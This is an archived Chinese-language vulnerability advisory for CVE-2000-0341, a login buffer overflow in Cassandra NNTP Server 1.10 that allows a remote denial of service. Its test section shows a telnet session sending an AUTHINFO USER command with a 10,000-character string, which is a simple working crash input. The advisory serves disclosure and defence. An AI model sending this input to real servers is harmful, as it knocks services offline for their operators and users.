发布日期：2000-05-01
更新日期：2000-05-01

受影响系统：

Atrium Software Cassandra NNTP Server 1.10
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95

描述：

---

BUGTRAQ  ID: 1156
CVE(CAN) ID: CVE-2000-0341

Cassandra NNTP是一个新闻组服务器程序。

Cassandra NNTP实现上存在一个缓冲区溢出漏洞，远程攻击者可能利用此漏洞对服务器程序进行拒绝服务攻击。

Cassandra NNTP v1.10 server软件在处理登陆信息时没有进行正确的长度检查，当用户输入一个长度超过10000字节的登陆名时，将导致NNTP Server停止响应，直到管理员重新启动此应用程序。


<*来源：Ussr Labs （labs@USSRBACK.COM）
  
  链接：http://www.sumthin.nu/archives/ntbt/May_2000/msg00001.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ussr Labs （labs@USSRBACK.COM）提供了如下测试方法：

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000  xx:xx:xx +-300 (posting allowed)  
AUTHINFO USER <10 000 character string>

建议：

---

厂商补丁：

Atrium Software
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.atrium-software.com/

浏览次数：6022
严重程度：0（网友投票）